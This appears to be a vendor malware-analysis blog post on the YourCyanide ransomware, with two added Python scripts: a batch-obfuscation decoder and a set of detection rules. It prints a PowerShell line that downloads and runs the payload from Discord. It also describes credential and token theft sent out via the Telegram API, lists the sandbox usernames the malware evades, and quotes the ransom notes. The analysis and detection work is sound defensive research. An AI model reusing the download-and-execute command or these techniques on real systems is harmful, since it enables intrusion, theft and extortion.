YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation

The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number of capabilities, such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.

In this blog entry, we analyze YourCyanide, the latest variant of the CMD-based ransomware family that began with GonnaCope. YourCyanide is a sophisticated ransomware that uses Pastebin, Discord, and Microsoft document links as part of its payload download routine. It contains multiple layers of obfuscation and takes advantage of custom environment variables and delayed variable expansion (EnableDelayedExpansion) to hide its activities. As part of its evasion strategy, YourCyanide also chains through several intermediate files, each stage downloading the next from Discord or Pastebin, before eventually downloading the main payload.

Note that the ransomware is still currently under development, so some portions of the routine — like the actual encryption portion — are not finalized (YourCyanide currently renames the files under specific directories, but does not encrypt anything).

Figure 1. An obfuscated batch script

The earliest sample of this ransomware, known as GonnaCope, was found by Twitter user Petrovic in April 2022. This variant possessed the ability to overwrite its victim’s files — however, this was limited to the current directory in which the ransomware was being executed.

Upon checking the latest variant of this malware, we observed that the malware author was sending messages to all users in the compromised network notifying them of the infiltration. Along with this, another message was sent stating that “Kekware and Kekpop were just the begining” — indicating that the author was preparing a more sophisticated variant of the original ransomware.

Figure 2. A message warning victims of potentially more sophisticated variants of the ransomware

Table 1 shows when the additional variants of the original CMD/BAT-based ransomware were uploaded to VirusTotal.

Date earliest sample was uploaded to VirusTotal | Ransomware sample
07 Apr 2022                                     | GonnaCope
07 May 2022                                     | Kekpop
11 May 2022                                     | Kekware
13 May 2022                                     | YourCyanide

Table 1. CMD-based ransomware samples and their date of upload to VirusTotal

YourCyanide technical analysis

Infection flow

Figure 3. YourCyanide infection routine

Figure 4. Exfiltration of stolen information

Arrival

It initially arrives as an LNK file that contains the following PowerShell command for downloading the 64-bit executable "YourCyanide.exe" from Discord and executing it:

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "(New-Object Net.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe', 'YourCyanide.exe')"; start YourCyanide.exe"

Figure 5. LNK file containing the shellcode

This 64-bit executable file creates and executes a CMD file with the filename YourCyanide.cmd.

Figure 6. Creating and executing YourCyanide.cmd

The dropped YourCyanide.cmd file contains a script downloaded from Pastebin that is saved using the same filename (YourCyanide.cmd).

Figure 7. Code snippets from the YourCyanide.cmd file

The ransomware will create a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce for cleanup purposes. It then runs advpack.dll to delete the folder containing the malicious CMD file to remove traces of the downloader from the machine.

Figure 8. Creating a registry key for cleanup

Analyzing YourCyanide.cmd

The downloaded script file contains 10 layers of obfuscated code, and each layer must be deobfuscated to reveal the next. It relies on the EnableExtensions and EnableDelayedExpansion settings of setlocal; with delayed expansion enabled, variables referenced as !var! are expanded at execution time rather than at parse time, which lets the script rebuild strings from variables it defined earlier in the same block.

The malware's obfuscation relies on the cmd.exe substring syntax:

%parameter:~index of first character,number of characters to take%

For example, %Kesik:~19,1% returns one character, starting at index 19 (zero-based), from the value of the variable Kesik.
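An analyst rarely resolves these substrings by hand across ten layers. The following Python script, added here as an example and not taken from the post or the malware, walks a batch script top to bottom, records each set assignment, and resolves %var:~start,len% and !var:~start,len! references with cmd.exe's substring rules (including negative start and length). The seed variable Kesik and the script lines are constructed for the example; the only thing they share with the real sample is the obfuscation pattern.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample in the style the post describes: a seed variable and
# %var:~index,count% / !var:~index,count! substrings that rebuild strings
# one character at a time. It is not taken from the YourCyanide sample.
SAMPLE_SCRIPT = r'''
@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "Kesik=pots nexcr"
set "a=%Kesik:~5,1%%Kesik:~6,1%%Kesik:~2,1%"
set "b=%Kesik:~3,1%%Kesik:~2,1%%Kesik:~1,1%%Kesik:~0,1%"
set "c=!a!%Kesik:~4,1%!b!"
set "d=%Kesik:~-5,1%%Kesik:~1,1%%Kesik:~-1,1%%Kesik:~2,1%%Kesik:~1,1%%Kesik:~5,1%"
!c! !d!
'''

# %name%, !name!, %name:~start%, %name:~start,len% (and the ! forms).
REF = re.compile(r"(%|!)([A-Za-z_]\w*)(?::~(-?\d+)(?:,(-?\d+))?)?\1")
# set "name=value" or set name=value
SET = re.compile(r'^set\s+"?([A-Za-z_]\w*)=(.*?)"?$', re.IGNORECASE)


def cmd_substr(value: str, start: int, length: Optional[int]) -> str:
    """Apply cmd.exe substring rules: a negative start counts from the end,
    a negative length drops that many characters from the end."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if length is None:
        end = n
    elif length < 0:
        end = max(n + length, 0)
    else:
        end = start + length
    return value[start:end]


def expand(line: str, env: Dict[str, str]) -> str:
    """Resolve every variable reference in one line against env.
    Unknown names are left visible (cmd would expand %x% to nothing)."""
    def repl(m: "re.Match[str]") -> str:
        _, name, start, length = m.groups()
        if name.lower() not in env:
            return m.group(0)
        value = env[name.lower()]
        if start is None:
            return value
        return cmd_substr(value, int(start), None if length is None else int(length))
    return REF.sub(repl, line)


def deobfuscate(script: str) -> Tuple[List[str], Dict[str, str]]:
    """Walk the script top to bottom, expanding each line with the variables
    defined so far and recording new set assignments. Returns the expanded
    lines and the final variable table (names lower-cased, as cmd is
    case-insensitive)."""
    env: Dict[str, str] = {}
    out: List[str] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        line = expand(line, env)
        m = SET.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)
        out.append(line)
    return out, env


if __name__ == "__main__":
    for resolved in deobfuscate(SAMPLE_SCRIPT)[0]:
        print(resolved)
```

Each layer of a real sample is handled the same way: run the deobfuscator, take the expanded lines as the next layer's input, and repeat until no references remain.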

Figure 9. Code snippets showing the Enable Extensions and Enable Delayed Expansion commands

Upon execution, YourCyanide sets its file attributes as hidden and as a system file, then launches five maximized Command Prompt windows.

Figure 10. Launching five maximized Command Prompt windows

It will then try to add a user “session” to the Administrators group using the net localgroup command.

Figure 11. The net localgroup command being run

It also creates an autostart mechanism for persistence by creating a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run and then copying itself to the Startup directory. It also disables Task Manager by modifying its registry entry.

Figure 12. Code snippet showing YourCyanide creating a registry key and copying itself to the Startup directory for persistence

It then checks whether %SystemDrive%\AutoExec.bat exists; if so, it deletes the original, copies itself there, and sets the copy's attributes to read-only, hidden, and system.

It also avoids machines with the following usernames, some of which, according to our research, are usernames used by malware researchers and sandbox systems — implying that the malware author is noting which machines should be evaded:

  • a.monaldo
  • George
  • george
  • help
  • karolisliucveikis
  • Soumy
  • guent

After checking the username of the infected machine, it drops and executes a batch file in UserProfile\Documents\black.bat. This batch file is responsible for continuously opening the Blank Screen Saver file, which renders the machine inaccessible while the malware is running.

Figure 13. Dropping and executing the batch file

YourCyanide also terminates several services and security applications by concatenating variables to form the strings “net stop,” “norton,” “symantec,” and “McAfee.”

Figure 14. Code snippet showing YourCyanide stopping services and security software

It then swaps the mouse buttons using the SwapMouseButton export of user32.dll.

After terminating applications, it renames files from the following directories to <Random>.<file extension>.<Random>.cyn:

  • %MyDesktop%
  • %MyDocuments%
  • %MyMusic%
  • %MyPictures%
  • %MyVideos%
  • %Downloads%

Although no actual encryption is being performed, users will still be heavily inconvenienced due to their files being renamed — especially for those with large amounts of files in these particular folders. Furthermore, since the malware is still currently under development, it’s likely that the malware authors are still finalizing the encryption portion of the routine.

It then creates the following ransom notes and drops them into %MyDesktop%:

  • YcynNote.txt
  • other.txt

Figure 15. The ransom notes dropped by YourCyanide (including the warning shown in Figure 2)

It features two instances in which it copies itself to batch files and then appends the malicious code (shown in Figure 16) to win.ini and system.ini.

Figure 16. The malicious code that is appended to win.ini and system.ini

After performing its routine, it deletes the black.bat file in the %MyDocuments% directory, which is responsible for rendering the machine inaccessible. Deleting the file will stop the blank screen saver file from continuously opening.

Figure 17. The black.bat file responsible for rendering the infected machine inaccessible

Lateral movement

YourCyanide is also capable of spreading via email and to different drives. It creates two VBScript files, mail.vbs and loveletter.vbs, that send an email using the following subjects (with itself as an attachment):

  • I Have a crush on you
  • Check This Out

It then copies itself to the following drives or directories:

  • D:
  • E:
  • F:
  • G:
  • H:
  • %UserProfile%

Bypassing remote desktop connections and firewalls

YourCyanide enables Remote Desktop Protocol (RDP) connections by using the netsh commands shown in Figure 18.

Figure 18. Using netsh commands for RDP connection

The ransomware opens multiple local ports by adding firewall rules for Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections via the netsh advfirewall function.

Figure 19. Opening multiple local ports

It then downloads and executes another CMD file (ycynlog.cmd) from hxxps://pastebin[.]com/raw/2K5m42Xp.
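The behaviours described so far (adding a user to Administrators, writing Run/RunOnce autostart keys, disabling Task Manager, stopping security products with net stop, and opening ports with netsh advfirewall) are each common in legitimate administration, but rarely all on one host within one session. The following Python script, added here as an example and not part of the post, runs rules for those behaviours over constructed Sysmon-style process-creation records and flags a host only when several distinct behaviours co-occur. The sample command lines, the DisableTaskMgr policy path used in them, and the threshold are assumptions for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation records in a Sysmon Event ID 1-like shape
# (image, command line). They are invented for this example, not telemetry
# from the samples in the post.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup Administrators session /add"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ycyn /d "C:\Users\Public\YourCyanide.cmd" /f'},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"},
    {"image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall add rule name="rdp" dir=in action=allow protocol=TCP localport=3389'},
    {"image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net stop "Norton Security"'},
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},
    {"image": r"C:\Windows\System32\netsh.exe", "cmdline": "netsh interface show interface"},
]

# One rule per behaviour described in the post. Case-insensitive because
# cmd.exe accepts any casing, and net1.exe is matched alongside net.exe.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("local account added to Administrators",
     re.compile(r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("Run/RunOnce autostart key written",
     re.compile(r"\breg\s+add\s+HK(LM|CU)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\b", re.I)),
    ("Task Manager disabled via policy",
     re.compile(r"\bDisableTaskMgr\b.*\s/d\s+1\b", re.I)),
    ("security product service stopped",
     re.compile(r"\bnet1?\s+stop\b.*\b(norton|symantec|mcafee)\b", re.I)),
    ("inbound firewall allow rule added",
     re.compile(r"\bnetsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b", re.I)),
]


def match_event(event: Dict[str, str]) -> List[str]:
    """Return the labels of every rule whose pattern hits this command line."""
    return [label for label, pattern in RULES if pattern.search(event["cmdline"])]


def hunt(events: List[Dict[str, str]], threshold: int = 3) -> Tuple[List[Tuple[int, str]], bool]:
    """Evaluate all records from one host. Returns (hits, flagged), where hits
    are (record index, rule label) pairs and flagged is True when at least
    `threshold` distinct behaviours were seen, i.e. the chain, not one command."""
    hits: List[Tuple[int, str]] = []
    for idx, event in enumerate(events):
        for label in match_event(event):
            hits.append((idx, label))
    distinct = {label for _, label in hits}
    return hits, len(distinct) >= threshold


if __name__ == "__main__":
    found, flagged = hunt(SAMPLE_EVENTS)
    for idx, label in found:
        print(f"record {idx}: {label}")
    print("host flagged:", flagged)
```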

Exfiltration of stolen information

The ycynlog.cmd file is responsible for the collection and exfiltration of stolen information from the compromised machine. Like the main file, it also features multiple layers of obfuscation. Upon execution, the file hides itself and creates its autostart mechanism by producing a registry key in HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and by copying itself to the Startup directory.

The malware uses the Telegram chatbot API to exfiltrate the stolen information and stores the endpoint in the variable "Webhook".

Figure 20. Using the Telegram Chatbot API for data exfiltration

It downloads another executable from Discord (GetToken.exe). Running this executable creates the file MyTokens.txt, which contains stolen access token data from different applications such as Chrome, Discord, and Microsoft Edge.

Figure 21. Downloading GetToken.exe

It also collects the following machine information and stores it in userdata.txt:

  • IP addresses
  • MAC addresses
  • CPU Information
  • Memory Size
  • Partition information
  • System specifications
  • OS product key
  • Currently running processes

Both Tokens.txt and userdata.txt will then be sent via Telegram chatbot API using the curl command.

We also discovered that YourCyanide exfiltrates Minecraft-related credentials.

Figure 22. Exfiltrating Minecraft-related credentials

Finally, it downloads another executable from Google Docs and executes it using the parameter “/stext ForME.txt”. ForMe.txt will then be sent to the Telegram chatbot. While the Google Docs link is currently inaccessible, and therefore a sample can’t be sourced, we noticed that it is run using the same parameter as the sample “passwords.exe,” which is also used by the earlier Kekpop variant. The parameter “/stext” is employed when executing the file, which is similar to the WebBrowserPassView application used to retrieve credentials stored by various web browsers such as Internet Explorer (Version 4.0 – 10.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.

Figure 23. Downloading the executable from Google Docs

The file created from executing passwords.exe contains saved passwords that are stored in Google Chrome.

Figure 24. The file created from executing passwords.exe

Avoiding usernames

Of the usernames this malware avoids, three in particular stand out: a.monaldo, karolisliucveikis, and soumy. Upon further research, we discovered that these are usernames from sandbox environments.

a.monaldo

The username of the sandbox machine used by Hunter Yomi

Figure 25. Screenshot showing the a.monaldo username (image from yomi.yoroi.company)

karolisliucveikis

The username of the sandbox machine used by PCRisk

Figure 26. Screenshot showing the karolisliucveikis username (image from pcrisk.com)

soumy

Figure 27. Screenshot showing the soumy username (image from sonicwall.com)

Variant Comparison

The team analyzed these CMD-based ransomware variants and compiled the following table comparing each variant and their differences. One notable difference is that GonnaCope, the earliest variant, does not collect user credentials from web browsers or the list of installed applications, and does not enable RDP connections. Furthermore, it does not execute black.bat, the file that temporarily renders the machine inaccessible while the malware executes its payload. We also observed that the BTC address used by GonnaCope differs from the BTC address of the succeeding variants, and that it uses a different ransom note format. The variants also differ in their delivery, shifting between arriving as an archive, executable files, or LNK files that drop the CMD-based ransomware. The payloads are also located at different points in the chain, with some found in the main CMD file and others in files downloaded from Pastebin and Discord.

Behavior | GonnaCope | Kekware | Kekpop | YourCyanide
Creates auto-start mechanism | Yes | Yes | Yes | Yes
Disables Task Manager | Yes | Yes | Yes | Yes
Checks the username of the machine | No | Yes | Yes | Yes
Creates and executes black.bat to continuously turn on Blank Screen Saver | No | Yes | Yes | Yes
Stops services | Yes | Yes | Yes | Yes
Terminates applications | Yes | Yes | Yes | Yes
Swaps mouse buttons | Yes | Yes | Yes | Yes
Renames files | GonnaCope.cope or random.cope | <Random>.<file extension>.<Random>.cyn | <Random>.<file extension>.<Random>.kekpop | <Random>.<file extension>.<Random>.cyn
Gathers a list of installed applications | No | Yes | Yes | Yes
Collects machine information | Yes | Yes | Yes | Yes
Collects token access data | Yes | Yes | Yes | Yes
Collects passwords saved in web browsers | No | Yes | Yes | Yes
Sends an email with a copy of itself as an attachment | Yes | Yes | Yes | Yes
Subject of sent email | "Is this you?" and "Here is that document you needed" | "I Have a crush on you" and "Check This Out" | "I Have a crush on you" | "I Have a crush on you" and "Check This Out"
Copies itself in drives | Yes | Yes | Yes | Yes
Enables RDP connection | No | Yes | Yes | Yes
Other messages | (none listed) | (none listed) | kekpop is on your network | Kekware and kekpop were just the beginning
BTC wallet used | bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll | bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf | bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf | bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf

Ransom note message, per variant:

GonnaCope:
Your files are unusable pay $100 in bitcoin to bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll to get your files back or allow it into outlook for a decryption key

Kekware:
Q: What happened to my files
A: They got encrypted by kekware.
Q: how can i get them back
A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf.
Q: What happens if i dont pay
A: You will never get your files back.

Kekpop:
Q: What happened to my files?
A: They got encrypted by kekpop.
Q: how can i get them back?
A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf
Q: What happens if i dont pay?
A: You will never get your files back.
Q: Is this related to kpop?
A: No fuck kpop

YourCyanide:
Q: What happened to my files?
A: Oops! your files have been encrypted by YourCyanide.
Q: how can I get them back?
A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf.
Q: What happens if I dont pay
A: You will never get your files back.
Q: How can I contact you
A: contact at yourcyanide.help@gmail.com
++++++++++++++++++++++++++++++++++++++++++++
RAndOm Files have been encrypted

Conclusion

The continued use of heavily obfuscated scripts results in very low detection rates for these CMD-based ransomware variants, making it easier for them to compromise victims' machines. Even though the technique is not new, the use of multiple layers of custom environment variables for obfuscation is highly effective at avoiding detection. These ransomware variants are also capable of downloading multiple payloads, performing lateral movement via email, and using Discord, Pastebin, and even Microsoft document links as hosting.

Figure 28. Low detections of CMD-based ransomware

From our analysis, we infer that the malware author actively monitors the reports published by malware researchers, notes the usernames that appear in their sandbox logs and screenshots, and adds them to the list of usernames that the malware checks during initialization so that those machines are skipped.

Ransomware variants that possess multiple capabilities — such as the one analyzed in this blog entry — are gaining popularity. While YourCyanide and its sibling variants are currently not as impactful as other families, the family represents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a single mid-tier ransomware framework.

It is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them before they can evolve further and do even more damage.

Trend Micro solutions

A multilayered approach can help organizations defend against ransomware attacks using security technologies that can detect malicious components and suspicious behavior.

  • Trend Micro Vision One™ provides multilayered protection and behavior detection, which helps block suspicious behavior and tools before the ransomware can do any damage.
  • Trend Micro Cloud One™ Workload Security protects systems against both known and unknown threats that exploit vulnerabilities through virtual patching and machine learning.
  • Trend Micro™ Deep Discovery™ Email Inspector employs custom sandboxing and advanced analysis techniques to effectively block malicious emails that can serve as entry points for ransomware.
  • Trend Micro Apex One™ offers automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring endpoint protection.

Indicators of Compromise
